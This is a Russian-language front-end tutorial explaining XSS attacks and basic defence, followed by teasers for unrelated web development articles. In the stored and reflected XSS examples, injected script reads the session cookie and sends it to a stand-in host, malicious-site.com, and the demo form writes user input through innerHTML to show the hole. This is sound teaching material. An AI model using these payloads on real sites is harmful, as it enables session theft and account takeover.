XSS-уязвимости и как их избежать
- 7 апреля 2023
Аббревиатура XSS расшифровывается как Cross-Site Scripting (межсайтовый скриптинг). Если особо не погружаться в детали, смысл атаки заключается во внедрении вредоносного кода в страницу. Атака не затрагивает серверную часть, но напрямую влияет на клиентскую — на пользователей уязвимого сервиса.
А какой код можно внедрить в страницу? У страницы же нет доступа к базе данных или другому серверному компоненту, где можно получить данные пользователей. Речь идёт о зловредном JavaScript-коде.
Вам хорошо известно: для выполнения JavaScript-кода на странице (в контексте фронтенда) необходимо разместить его между тегами <script></script>
. Про этот способ мы рассказывали в первой главе учебника. Атака XSS в этом и заключается. Злоумышленник внедряет в страницу зловредный JavaScript-код. Пользователь переходит на эту страницу, код выполняется и конфиденциальные данные пользователя отправляются злоумышленнику.
Схема работы XSS
На практике это может выглядеть так. Представьте персональный блог, в котором все зарегистрированные пользователи могут оставлять комментарии к публикациям.
Всё работает прекрасно, пока не появляется пользователь, который хочет не просто обсуждать публикации, а украсть доступ к учётным записям других пользователей блога. Для этого злоумышленник в поле комментарий пишет какой-то текст, тег <script>
, а в нём немного JavaScript-кода. Если не происходит никакой фильтрации, то после публикации такого комментария, код будет выполняться у всех пользователей, посетивших страницу.
А что опасного может быть в этом коде? Часто разработчики используют cookie для хранения идентификатора сессии пользователя. Что такое идентификатор? Это строка с уникальным набором символов, позволяющих отличить одного авторизованного пользователя от другого.
Зловредный код может прочитать это значение и передать на сервер злоумышленника при помощи AJAX-запроса. В этом и заключается смысл XSS-атаки. Собрав такие идентификаторы, злоумышленник может подставить их себе. Если разработчик не предусмотрел дополнительной защиты, то злоумышленник сможет войти в приложение под учётной записью пользователя.
Рассмотренный сценарий выше — один из самых популярных, но не единственный. При отсутствии фильтрации, можно выполнить любой JavaScript-код. Например, собрать все данные со страницы (при помощи банальных querySelector
) или сделать другие деструктивные действия.
XSS на примере
Попробуем взглянуть на проблему с практической точки зрения. Создадим демонстрационное приложение и на реальном примере узнаем, что подразумевается под XSS. В качестве демонстрационного приложения сделаем простую форму для ввода имени. Пользователь вводит имя, отправляет форму, и в параграфе появляется текст с приветствием пользователя. Приложение максимально простое, но оно прекрасно проиллюстрирует проблему:
<form id="basic-form">
<input id="user-name" type="text">
<input type="submit" value="Отправить" placeholder="Пожалуйста, представьтесь">
<p id="welcome-user"></p>
</form>
<script>
'use strict';
const submitFormHandler = (evt) => {
evt.preventDefault();
welcomeUserElement.innerHTML = `Привет, ${userNameElement.value}!`;
}
const formElement = document.querySelector(`#basic-form`);
const welcomeUserElement = formElement.querySelector(`#welcome-user`);
const userNameElement = formElement.querySelector(`#user-name`);
formElement.addEventListener(`submit`, submitFormHandler);
</script>
Попробуйте открыть страницу в браузере и протестировать приложение. Убедитесь, что всё работает так, как и было запланировано.

В качестве теста мы ввели имя «Igor», и оно отобразилось в параграфе. Приложение работает так, как мы и ожидаем. Теперь давайте вместо имени введём на первый взгляд безобидную строку:
<img src="" onerror="alert('xss')">
Нажмите кнопку «Отправить». На этот раз в параграфе #welcome-user
отобразится «Привет, !», но в довесок к этому вы увидите модальное окно с текстом «xss». Мы внедрили в страницу сторонний JavaScript-код. В примере он показывает бесполезное модальное окно, но вы понимаете, что он может делать намного больше. Выше мы обсуждали несколько негативных сценариев.

Рассмотрим ещё один пример и разберёмся, как выглядит внедрение XSS изнутри. Представим, что вы разрабатываете какой-нибудь форум любителей аквариумных рыбок. Пусть схематично его разметка выглядит так:
<h1>Здравствуйте, <span class="username">Обычный Пользователь</span>!</h1>
<article class="topic">
<header class="topic-header">
<h2>Разведение пираний в домашних условиях</h2>
</header>
<p class="topic-body">
Всем привет. Я решил завести себе пираний.
Расскажите, какие плюсы, минусы, подводные камни.</p>
<footer class="posted-by">
От <span class="poster-name">Другой Пользователь</span>
</footer>
</article>
Простая разметка — ничего необычного. Один из пользователей, который создал эту тему для обсуждения выбрал при регистрации необычное имя. Вот такое:
Другой пользователь</span><script>const username=document.querySelector('.username').textContent;const sessionCookie=document.cookie.match(/session-token=([^;$]+)/)[1];fetch('http:/www.malicious-site.com',{method: 'post',body:JSON.stringify({username,sessionCookie})});</script>
Что произойдёт, если другой участник обсуждения просмотрит эту тему? Разметка страницы начнёт выглядеть следующим образом (отформатировано для читабельности):
<h1>Здравствуйте, <span class="username">Обычный Пользователь</span>!</h1>
<article class="topic">
<header class="topic-header">
<h2>Разведение пираний в домашних условиях</h2>
</header>
<p class="topic-body">
Всем привет. Я решил завести себе пираний.
Расскажите, какие плюсы, минусы, подводные камни.</p>
<footer class="posted-by">
От <span class="poster-name">Другой Пользователь</span>
<script>
const username = document.querySelector(`.username`).textContent;
const sessionCookie = document.cookie.match(/session-token=([^;$]+)/)[1];
fetch(`http:/www.malicious-site.com`, {
method: `post`,
body: JSON.stringify({username, sessionCookie})
});
</script>
</footer>
</article>
Визуально на странице ничего не изменится. Всё то же безумное объявление, но это лишь на первый взгляд. Экзотичное имя пользователя (то самое с кодом) содержало закрывающий тег </span>
. Выходит, что на этом описание элемента с именем пользователя заканчивается. За ним следует тег <script>
c JavaScript кодом, который браузер вынужден исполнить.
Выполнение этого кода приведёт к отправке идентификатора сессии на сервер злоумышленника (www.malicious-site.com
). Получив идентификатор, злоумышленник сможет подставить его себе и войти в сервис от имени пользователя. Дальше можно изменить профиль (если сервис позволяет это сделать без ввода пароля) и сделать другие деструктивные действия.
Виды XSS
Существует два основных вида XSS-атак. Первый — хранимые XSS (Stored XSS). Его мы разобрали в предыдущем примере. Один пользователь вводит зловредные данные, которые сохраняются на сервере и оттуда попадают на страницу другого пользователя.

Другой вид — отражённые XSS (Reflected XSS). Атаки этого типа выглядят иначе. Допустим, на форуме любителей рыбок есть поиск по сообщениям. Маршрут на страницу с выдачей результатов может выглядеть так:
http://www.aquarium-forum.com/search?q=guppy
При переходе пользователь увидит страницу примерно с такой разметкой:
<div class="query">
Результаты поиска по запросу <span class="query-text">guppy</span>:
</div>
<div class="result">
<!-- результаты поиска -->
</div>
Ничего необычного в этой разметке нет, но представьте, что один из пользователей форума любителей рыбок получит на свой email провокационное письмо: «Шокирующая правда о гуппи! Рыбки не переносят… (продолжение по ссылке)». Пользователь на эмоциях переходит по ней (он видит, что она ведёт на его любимый форум) и видит вполне ожидаемую страницу с результатами поиска. Только без шокирующих новостей, но идентификатор его сессии уже улетел злоумышленнику. Ссылка в письме выглядела так:
http://www.aquarium-forum.com/search?q=guppy<script>fetch('http:/www.malicious-site.com?cookie='+document.cookie)</script>
После перехода по ссылке, разметка страницы преобразилась и обзавелась одной строкой кода на JavaScript. Визуально это незаметно, но браузер выполнит код, который не предполагал разработчик:
<div class="query">
Результаты поиска по запросу <span class="query-text">guppy
<script>
fetch('http:/www.malicious-site.com?cookie=' + document.cookie);
</script>
</span>:
</div>
<div class="result">
<!-- результаты поиска -->
</div>

Защита от XSS
Основная причина появления XSS заключается в недостаточной фильтрации входных данных. Мы это видели на двух примерах. Давайте подумаем, как бороться с этой проблемой. Начнём с простого: не стоит вставлять пользовательские данные в свойство innerHTML
.
Если пользователь пришлёт разметку с кодом на JavaScript, то браузер интерпретирует код и станут возможны сценарии, о которых говорили выше. Что же делать? Самый простой вариант: вместо innerHTML
применять innerText
. Тогда содержимое будет отображаться как простой текст.
Резюме
XSS атаки представляют серьёзную угрозу для веб-приложений. В этом разделе мы рассмотрели теорию и один из самых простых вариантов защиты. Конечно, это решение нельзя назвать серебряной пулей. К вопросам безопасности следует подходить комплексно: как на клиенте, так и на сервере. Запомните главное правило: любые данные, полученные от пользователя, по умолчанию нельзя считать безопасными.
Ещё по теме
«Доктайп» — журнал о фронтенде. Читайте, слушайте и учитесь с нами.
Читать дальше

document.open(), write(), writeln(), close() в браузере: когда можно и когда нельзя
Эти методы управляют потоковой записью HTML прямо в документ. Они удобны во время парсинга страницы, но опасны после загрузки: могут стереть текущее содержимое, блокируют поток, ухудшают производительность и плохо сочетаются с современными практиками. Ниже — безопасные сценарии, риски и актуальные альтернативы.
Функция находится в статусе ограниченной доступности в Baseline.
- 10 августа 2025

Как работает navigator.credentials: API для входа без пароля
navigator.credentials
— это интерфейс Web Authentication API, который позволяет браузеру управлять учётными данными пользователя. С его помощью можно безопасно получать, сохранять и автоматически подставлять данные для входа: пароли, токены или ключи. Это делает процесс аутентификации проще и безопаснее — особенно на сайтах, где важен пользовательский опыт и скорость входа.
Доступно в Baseline в статусе «Widely Available» с 2022-07-15
Как это работает
Сегодня вам бесплатно доступен тренажёр по HTML и CSS.
Вы можете запросить сохранённые данные с помощью navigator.credentials.get()
. Например, при загрузке страницы входа можно попытаться автоматически получить логин и пароль пользователя, если он ранее их сохранил:
const cred = await navigator.credentials.get({
password: true,
mediation: 'optional' // чтобы не мешать потоку, если данных нет
});
if (cred) {
console.log('Получен логин:', cred.id);
console.log('Пароль:', cred.password);
// Здесь можно автоматически отправить данные на сервер
}
Если учётные данные доступны, вы можете использовать их для входа без дополнительных действий от пользователя. Это особенно удобно на мобильных устройствах и в приложениях с частыми сессиями.
Можно ли сохранять логин и пароль вручную?
Да, через navigator.credentials.store()
вы можете сохранить учётные данные, которые пользователь только что ввёл:
const cred = new PasswordCredential({
id: 'user@example.com',
password: '12345678'
});
await navigator.credentials.store(cred);
Теперь при следующем визите вы сможете использовать get()
, чтобы получить эти данные без необходимости ручного ввода.
Безопасность
API работает только на HTTPS и требует, чтобы страница была в фокусе. Браузеры могут показывать уведомления, если данные используются без явного действия пользователя — это защита от скрытых запросов.
Поддержка и ограничения
- Поддерживается в Chrome, Edge, Android WebView.
- Safari и Firefox поддерживают только часть API или вовсе не поддерживают.
- Нельзя использовать на сторонних сайтах (только собственный домен).
Это API особенно хорошо подходит для проектов, где важна быстрая авторизация и нет смысла постоянно спрашивать логин-пароль у пользователя.
Больше обзоров веб-функций — в телеграм-канале HTML Academy.
Нашли ошибку или опечатку? Напишите нам.
- 3 августа 2025

Как использовать cause для более понятной обработки ошибок в JavaScript
Новое свойство cause
в объекте error
позволяет узнать исходную причину сбоя и облегчить отладку, особенно при повторении ошибок. Оно помогает выстроить цепочку событий и лучше понимать, где возникла проблема. Свойство доступно в Baseline в статусе «Widely Available» с 20 марта 2024 года.
- 3 августа 2025

HTTP/3: зачем он нужен и как понять, что он работает
HTTP/3 — это новая версия протокола обмена данными между браузером и сервером. В отличие от предыдущих HTTP/1.1 и HTTP/2, он построен поверх протокола QUIC и использует UDP вместо TCP. Это делает соединения быстрее, стабильнее и безопаснее.
HTTP/3 доступен в Baseline в статусе «Newly Available» с 2024-09-16.
Чем HTTP/3 лучше
🚀 Сегодня вам бесплатно доступен тренажёр по HTML и CSS.
- Быстрее устанавливается соединение. Больше нет отдельной стадии TLS: всё объединено.
- Меньше задержек. Даже при потере пакета браузер не ждёт восстановления всего потока, как в TCP.
- Устойчивость к переключениям сети. QUIC сохраняет соединение, даже если пользователь, например, переключился с Wi-Fi на LTE.
- Безопасность по умолчанию. Все соединения — только через шифрование (TLS 1.3).
Эти преимущества особенно важны для мобильных пользователей и тех, кто часто сталкивается с нестабильным интернетом.
Как работает
HTTP/3 основан на QUIC — это транспортный протокол от Google, который работает через UDP. Он умеет передавать данные параллельно по разным потокам, не блокируя друг друга при сбоях. QUIC внедрён в современные браузеры и серверные платформы.
Нужно ли что-то делать?
Если вы разработчик сайта или веб-приложения, то скорее всего ничего специально делать не нужно — браузер сам выберет HTTP/3, если сервер его поддерживает. Ваш сайт будет работать быстрее просто потому, что инфраструктура на это перешла.
Если вы настраиваете сервер (например, NGINX или Cloudflare), тогда стоит включить поддержку HTTP/3. На популярных платформах это можно сделать одной строчкой.
Как проверить, используется ли HTTP/3
В Chrome или Edge:
- Откройте DevTools → вкладка Network.
- Перезагрузите страницу.
- Добавьте колонку Protocol (правый клик по шапке таблицы).
- Посмотрите, есть ли
h3
у запросов — это и есть HTTP/3.
Через терминал (если у вас установлен curl):
curl -I --http3 https://example.com
Если сервер не поддерживает HTTP/3, будет ошибка или произойдёт откат на HTTP/2.
Через JavaScript
На уровне кода нельзя напрямую узнать версию протокола, но можно сделать fetch и посмотреть заголовки ответа через инструменты разработчика:
fetch('https://example.com')
.then(response => console.log(response.headers))
А затем проверить в DevTools, какой протокол был использован.
Что важно помнить
- HTTP/3 — это не «фича», которую вы вызываете в коде, а часть транспортного уровня.
- Он поддерживается большинством современных браузеров: Chrome, Firefox, Edge, Safari.
- Но он работает только с HTTPS, как и HTTP/2.
Заключение
HTTP/3 делает интернет быстрее, безопаснее и стабильнее — особенно на слабых сетях и мобильных устройствах. Вам не нужно менять HTML, JavaScript или CSS, чтобы получить преимущество. Главное — чтобы сервер и хостинг поддерживали эту технологию.
Если вы разрабатываете сайт с упором на производительность — убедитесь, что HTTP/3 включён. Это шаг вперёд к более отзывчивым и доступным интерфейсам.
Больше обзоров веб-функций — в телеграм-канале HTML Academy.
Нашли ошибку или опечатку? Напишите нам.
- 27 июля 2025

Как работает Map в JavaScript
Коллекция Map
— это встроенный объект JavaScript, предназначенный для хранения пар ключ-значение. Она похожа на обычный объект ({}
), но обладает важными преимуществами:
- Любые типы ключей — строки, числа, объекты, функции.
- Сохранение порядка вставки — перебор идёт в том порядке, в котором вы добавили элементы.
- Удобные методы для работы —
set()
,get()
,has()
,delete()
,clear()
и итерации черезfor...of
.
Эта структура особенно полезна, если вы хотите чётко контролировать порядок элементов и не ограничиваться только строковыми ключами, как в обычных объектах.
Пример: создаём коллекцию и работаем с ней
? Сегодня вам бесплатно доступен тренажёр по HTML и CSS.
const userInfo = new Map();
userInfo.set('name', 'Алексей'); // строка
userInfo.set(42, 'Число'); // число
userInfo.set(true, 'Булево'); // логическое значение
console.log(userInfo.get(42)); // Выведет: 'Число'
Здесь мы добавили три элемента с разными типами ключей. Именно это отличает Map
от обычного объекта — вы можете использовать, например, ключи-объекты или даже функции:
const objKey = { id: 1 };
const fnKey = () => {};
userInfo.set(objKey, 'объект');
userInfo.set(fnKey, 'функция');
console.log(userInfo.get(objKey)); // 'объект'
Перебор Map
Вы можете пройтись по элементам Map
с помощью for...of
:
for (const [key, value] of userInfo) {
console.log(key, value);
}
Также доступны методы:
map.keys()
— только ключи,map.values()
— только значения,map.entries()
— пары [ключ, значение].
console.log([...userInfo.keys()]); // Все ключи
console.log([...userInfo.values()]); // Все значения
Проверка наличия, удаление и очистка
userInfo.has('name'); // true
userInfo.delete(42); // удаляет элемент с ключом 42
userInfo.clear(); // полностью очищает Map
Отличия от объектов
Особенность | Map | Object |
---|---|---|
Типы ключей | любые | только строки и символы |
Порядок | сохраняется | не гарантирован |
Итерация | проще и более гибкая | требует Object.entries и т. д. |
Производительность | быстрее на больших объёмах | может быть медленнее |
Когда использовать Map
Используйте Map
, если:
- Нужен предсказуемый порядок элементов.
- Ключами должны быть не только строки.
- Нужно часто добавлять, удалять или перебирать элементы.
- Важно избежать конфликтов с ключами вроде
__proto__
илиhasOwnProperty
.
Заключение
Map
— мощная и удобная структура данных, особенно когда работа с обычными объектами становится громоздкой. Она расширяет привычные возможности, делает код чище и понятнее, а также даёт контроль над ключами и порядком. В современном JavaScript Map
— это стандарт, на который стоит ориентироваться в сложных приложениях.
Больше обзоров веб-функций — в телеграм-канале HTML Academy.
Нашли ошибку или опечатку? Напишите нам.
- 27 июля 2025

10 приёмов работы с console, которые должен знать каждый разработчик
Консоль разработчика — важный инструмент отладки в JavaScript. С помощью методов console
можно выводить информацию о работе скрипта, отслеживать ошибки, логировать данные и анализировать производительность. В браузере это доступно через панель разработчика (DevTools), обычно на вкладке «Console».
- 18 июля 2025

Оператор ** в JS: возведение в степень
Оператор **
— это современный и лаконичный способ возводить числа в степень в JavaScript.
Он появился в стандарте ECMAScript 2016 и заменил собой более громоздкий вызов Math.pow()
.
Вместо Math.pow(3, 4)
теперь можно написать 3 ** 4
, что читается и набирается проще.
- 25 июня 2025

Полный гайд по объекту Date в JavaScript
Объект Date
позволяет создавать, сравнивать и форматировать дату и время. Используется для отображения текущего времени, вычисления интервалов и работы с таймзонами в веб-приложениях.
Доступно в Baseline в статусе «Widely Available» с 2018-01-29
- 25 июня 2025

FormControl и FormGroup в Angular
Если вы разрабатываете веб-приложение, вам рано или поздно придётся собирать данные от пользователя. К счастью, реактивные формы в Angular позволяют делать это без лишней сложности — без нагромождения директив и с минимальным количеством шаблонного кода. Более того, их просто валидировать, так что можно обойтись даже без end-to-end тестов.
Говоря проще, form control’ы в Angular дают полный контроль разработчику — ничего не происходит автоматически, и каждое решение по вводу и управлению принимается явно и осознанно. В этом руководстве мы покажем, как объединять form control’ы в form group’ы, чтобы структурировать форму и упростить доступ к её элементам — как к логическим блокам. Чтобы лучше понять, как работают form group’ы в Angular, мы шаг за шагом соберём реактивную форму.
Для работы с примером скачайте стартовый проект с GitHub и откройте его в VS Code. Если ещё не обновляли Angular, поставьте актуальную на момент написания версию — Angular v18.
- 1 июня 2025

AOT против JIT-компилятора: что лучше для разработки на Angular?
Angular — один из самых популярных фреймворков для фронтенда — предлагает два подхода к компиляции: предварительная компиляция и динамическая компиляция во время выполнения. Оба метода играют важную роль в оптимизации приложений на Angular и повышении их производительности. В этом материале мы рассмотрим различия между ними, их преимущества и разберёмся, когда стоит использовать каждый из подходов.
- 25 мая 2025